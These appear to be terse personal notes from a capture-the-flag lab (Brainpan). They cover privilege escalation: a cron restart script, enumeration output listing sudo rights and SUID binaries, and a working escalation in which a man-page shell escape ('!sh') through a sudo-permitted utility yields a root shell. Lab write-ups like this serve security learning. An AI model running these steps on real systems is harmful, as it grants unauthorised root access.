4 privesc

# checksrv.sh

#!/bin/bash
# run brainpan.exe if it stops
lsof -i:9999
if [[ $? -eq 1 ]]; then 
        pid=`ps aux | grep brainpan.exe | grep -v grep`
        if [[ ! -z $pid ]]; then
                kill -9 $pid
                killall wineserver
                killall winedevice.exe
        fi
        /usr/bin/wine /home/puck/web/bin/brainpan.exe &
fi 

# run SimpleHTTPServer if it stops
lsof -i:10000
if [[ $? -eq 1 ]]; then 
        pid=`ps aux | grep SimpleHTTPServer | grep -v grep`
        if [[ ! -z $pid ]]; then
                kill -9 $pid
        fi
        cd /home/puck/web
        /usr/bin/python -m SimpleHTTPServer 10000
fi

Directory of Z:\home
  3/4/2013   2:38 PM  <DIR>         anansi
  3/6/2013   3:23 PM  <DIR>         puck
  3/4/2013   2:43 PM  <DIR>         reynard

PEAS

[+] Cron jobs
* * * * * /home/puck/checksrv.sh
[+] Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
Matching Defaults entries for puck on this host:                                                 
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User puck may run the following commands on this host:
    (root) NOPASSWD: /home/anansi/bin/anansi_util
	
	
[+] Searching ldap directories and their hashes
/etc/ldap                                                                                         
The password hash is from the {SSHA} to 'structural'

[+] SUID - Check easy privesc, exploits and write perms
-rwsr-xr-x 1 root    lpadmin     14K Dec  4  2012 /usr/bin/lppasswd
-rwsr-xr-x 1 anansi  anansi     8.6K Mar  4  2013 /usr/local/bin/validate

sudo /home/anansi/bin/anansi_util
Usage: /home/anansi/bin/anansi_util [action]
Where [action] is one of:
  - network
  - proclist
  - manual [command]

https://gtfobins.github.io/gtfobins/man/
cd /tmp
echo "man man" > top
chmod +x top

sudo /home/anansi/bin/anansi_util manual man
!sh

whoami
root